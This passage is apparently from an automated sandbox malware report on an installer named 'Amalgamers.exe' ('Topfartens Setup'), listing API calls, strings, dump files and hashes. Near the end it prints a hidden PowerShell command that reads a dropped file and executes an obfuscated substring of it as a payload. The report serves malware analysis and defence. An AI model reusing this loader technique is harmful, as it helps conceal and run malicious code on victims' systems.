                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                        • DeleteObject.GDI32(?), ref: 004010ED
                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                        • DrawTextA.USER32(00000000,Topfartens Setup,000000FF,00000010,00000820), ref: 00401156
                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                        • DeleteObject.GDI32(?), ref: 00401165
                                        • EndPaint.USER32(?,?), ref: 0040116E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                        • String ID: F$Topfartens Setup
                                        • API String ID: 941294808-28998586
                                        • Opcode ID: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
                                        • Instruction ID: bc05fa60d2536021e17fc8d2ced0f843766159cda975d832d6f25ccf31630e85
                                        • Opcode Fuzzy Hash: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
                                        • Instruction Fuzzy Hash: C8419C71800209AFCF058F95DE459AFBBB9FF44310F00802EF9A1AA1A0C774D955DFA4
                                        APIs
                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405DA0,?,?), ref: 00405C40
                                        • GetShortPathNameA.KERNEL32(?,0042C600,00000400), ref: 00405C49
                                          • Part of subcall function 00405A9E: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAE
                                          • Part of subcall function 00405A9E: lstrlenA.KERNEL32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE0
                                        • GetShortPathNameA.KERNEL32(?,0042CA00,00000400), ref: 00405C66
                                        • wsprintfA.USER32 ref: 00405C84
                                        • GetFileSize.KERNEL32(00000000,00000000,0042CA00,C0000000,00000004,0042CA00,?,?,?,?,?), ref: 00405CBF
                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405CCE
                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D06
                                        • SetFilePointer.KERNEL32(0040A3B8,00000000,00000000,00000000,00000000,0042C200,00000000,-0000000A,0040A3B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D5C
                                        • GlobalFree.KERNEL32(00000000), ref: 00405D6D
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D74
                                          • Part of subcall function 00405B39: GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\Amalgamers.exe,80000000,00000003), ref: 00405B3D
                                          • Part of subcall function 00405B39: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B5F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                        • String ID: %s=%s$[Rename]
                                        • API String ID: 2171350718-1727408572
                                        • Opcode ID: f5205b29015aadf6075038324b6b1e83a67c9a1e7f2cc145563fcc6b36ef8083
                                        • Instruction ID: 165561d39814ef1f1a34b1aa6794dd1f6cd1d2ce27369611909fe2f807e8c01f
                                        • Opcode Fuzzy Hash: f5205b29015aadf6075038324b6b1e83a67c9a1e7f2cc145563fcc6b36ef8083
                                        • Instruction Fuzzy Hash: 5D310531200F19ABC2206B659D4DF6B3A5CDF45754F14443BFA01B62D2EA7CA8018EBD
                                        APIs
                                        • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Amalgamers.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406262
                                        • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040626F
                                        • CharNextA.USER32(?,"C:\Users\user\Desktop\Amalgamers.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406274
                                        • CharPrevA.USER32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406284
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 0040620B
                                        • "C:\Users\user\Desktop\Amalgamers.exe", xrefs: 00406246
                                        • *?|<>/":, xrefs: 00406252
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: Char$Next$Prev
                                        • String ID: "C:\Users\user\Desktop\Amalgamers.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 589700163-3855946930
                                        • Opcode ID: baaf8be525beb263cd2d66daa4244c7e43047c81ac15102dd5c23876bc89bcef
                                        • Instruction ID: 9cd3e807bb29f508aa56cad56700fba7970b0901ce3b2fdefae83793710aaee6
                                        • Opcode Fuzzy Hash: baaf8be525beb263cd2d66daa4244c7e43047c81ac15102dd5c23876bc89bcef
                                        • Instruction Fuzzy Hash: 1411E26180479129EB327A385C40BB76FD84F57764F1A04FFE8C6722C2C67C5C6292AE
                                        APIs
                                        • GetWindowLongA.USER32(?,000000EB), ref: 004040C3
                                        • GetSysColor.USER32(00000000), ref: 00404101
                                        • SetTextColor.GDI32(?,00000000), ref: 0040410D
                                        • SetBkMode.GDI32(?,?), ref: 00404119
                                        • GetSysColor.USER32(?), ref: 0040412C
                                        • SetBkColor.GDI32(?,?), ref: 0040413C
                                        • DeleteObject.GDI32(?), ref: 00404156
                                        • CreateBrushIndirect.GDI32(?), ref: 00404160
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                        • String ID:
                                        • API String ID: 2320649405-0
                                        • Opcode ID: 49e3bf83d30a7d96e63afb16dabbed360c02e673e0f4069f8acd1b63125549d3
                                        • Instruction ID: acf379a668eb7ba76ca74fd388386b38bd03efbb8d8a5887114ae3c25b447e5f
                                        • Opcode Fuzzy Hash: 49e3bf83d30a7d96e63afb16dabbed360c02e673e0f4069f8acd1b63125549d3
                                        • Instruction Fuzzy Hash: 122174715007049BCB309F78DD4CB5BBBF8AF91710B048A3EEA96A66E0D734D984CB54
                                        APIs
                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004049AD
                                        • GetMessagePos.USER32 ref: 004049B5
                                        • ScreenToClient.USER32(?,?), ref: 004049CF
                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 004049E1
                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404A07
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: Message$Send$ClientScreen
                                        • String ID: f
                                        • API String ID: 41195575-1993550816
                                        • Opcode ID: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                                        • Instruction ID: 01adb620d992fda54c9cccfda8f446508f93e77e16c9618e278126a6ed05cf06
                                        • Opcode Fuzzy Hash: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                                        • Instruction Fuzzy Hash: 14015E75900219BAEB00DBA4DD85BFFBBBCAF55711F10412BBA50F61C0C7B499418BA4
                                        APIs
                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C97
                                        • MulDiv.KERNEL32(00019800,00000064,000E6160), ref: 00402CC2
                                        • wsprintfA.USER32 ref: 00402CD2
                                        • SetWindowTextA.USER32(?,?), ref: 00402CE2
                                        • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CF4
                                        Strings
                                        • verifying installer: %d%%, xrefs: 00402CCC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: Text$ItemTimerWindowwsprintf
                                        • String ID: verifying installer: %d%%
                                        • API String ID: 1451636040-82062127
                                        • Opcode ID: 9d09083b9960c0948bcad18999385935d4fa9c03e82c6b05e18ea1cbbf7ae53f
                                        • Instruction ID: 0a6faa1976aca28fcdfc9934e3507063152a2d7882a275f196f36718a2c25724
                                        • Opcode Fuzzy Hash: 9d09083b9960c0948bcad18999385935d4fa9c03e82c6b05e18ea1cbbf7ae53f
                                        • Instruction Fuzzy Hash: 8F014F7064020CFBEF249F61DD09EEE37A9AB04304F008039FA06B52D0DBB989558F58
                                        APIs
                                        • CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004055D0
                                        • GetLastError.KERNEL32 ref: 004055E4
                                        • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055F9
                                        • GetLastError.KERNEL32 ref: 00405603
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004055B3
                                        • C:\Users\user\Desktop, xrefs: 0040558D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                        • API String ID: 3449924974-2028306314
                                        • Opcode ID: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
                                        • Instruction ID: 31ed81618c477e33f581cc85a0b23cfa0e691b84649e5a94383732ec19bc7550
                                        • Opcode Fuzzy Hash: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
                                        • Instruction Fuzzy Hash: 4E011A71C00219EADF109FA1C9047EFBBB8EF14355F10803AD545B6290DB799609CFA9
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402790
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027AC
                                        • GlobalFree.KERNEL32(?), ref: 004027EB
                                        • GlobalFree.KERNEL32(00000000), ref: 004027FE
                                        • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402816
                                        • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040282A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                        • String ID:
                                        • API String ID: 2667972263-0
                                        • Opcode ID: fcec2ffd70543583788ba2543a3bf4a61af8898bf95fefe6a16912793c9a43d2
                                        • Instruction ID: a22fe22bcc3eabd59056b14894fa73c1d09c67f360634fc0aee3e8da3dcac443
                                        • Opcode Fuzzy Hash: fcec2ffd70543583788ba2543a3bf4a61af8898bf95fefe6a16912793c9a43d2
                                        • Instruction Fuzzy Hash: 72219F71800124BBDF217FA5DE49E9E7B79AF09364F14423AF510762E0CB7959019FA8
                                        APIs
                                        • lstrlenA.KERNEL32(Topfartens Setup: Installing,Topfartens Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047A3,000000DF,00000000,00000400,?), ref: 00404926
                                        • wsprintfA.USER32 ref: 0040492E
                                        • SetDlgItemTextA.USER32(?,Topfartens Setup: Installing), ref: 00404941
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: ItemTextlstrlenwsprintf
                                        • String ID: %u.%u%s%s$Topfartens Setup: Installing
                                        • API String ID: 3540041739-550604392
                                        • Opcode ID: d0db812d9843545440e2aba8227c69b9d11a08aaabcfab80a4719ee44f66ea28
                                        • Instruction ID: 1010f8f0fc76c68cf0e8b2cd769f4e8eee9817d82106679565c36b77a1653ccb
                                        • Opcode Fuzzy Hash: d0db812d9843545440e2aba8227c69b9d11a08aaabcfab80a4719ee44f66ea28
                                        • Instruction Fuzzy Hash: FB110677A042282BEB00656D9C41EAF3698DB81334F25463BFA65F21D1E978CC1242E9
                                        APIs
                                        • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 0040202E
                                          • Part of subcall function 004050C7: lstrlenA.KERNEL32(Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",00000000,004195D8,74DF23A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
                                          • Part of subcall function 004050C7: lstrlenA.KERNEL32(004030F7,Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",00000000,004195D8,74DF23A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
                                          • Part of subcall function 004050C7: lstrcatA.KERNEL32(Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",004030F7,004030F7,Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",00000000,004195D8,74DF23A0), ref: 00405123
                                          • Part of subcall function 004050C7: SetWindowTextA.USER32(Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) "), ref: 00405135
                                          • Part of subcall function 004050C7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
                                          • Part of subcall function 004050C7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
                                          • Part of subcall function 004050C7: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183
                                        • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040203E
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0040204E
                                        • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B8
                                        Strings
                                        • powershell.exe -windowstyle hidden, xrefs: 00402082
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                        • String ID: powershell.exe -windowstyle hidden
                                        • API String ID: 2987980305-1683101720
                                        • Opcode ID: abecd26dfb3de0ce52c950ba2215734ba3e8e38533135c2a8ac1c574d6d38cf5
                                        • Instruction ID: c1ae46b168e5b47a3396f215b5b678e2f7e13ad55da110dce54edd367ac60368
                                        • Opcode Fuzzy Hash: abecd26dfb3de0ce52c950ba2215734ba3e8e38533135c2a8ac1c574d6d38cf5
                                        • Instruction Fuzzy Hash: D221C671A00215ABCF207FA48F4DBAE7A70AB54319F60413BE601B21D0CBBD49429A6E
                                        APIs
                                        • GetDC.USER32(?), ref: 00401D9E
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB8
                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401DC0
                                        • ReleaseDC.USER32(?,00000000), ref: 00401DD1
                                        • CreateFontIndirectA.GDI32(0040B818), ref: 00401E20
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
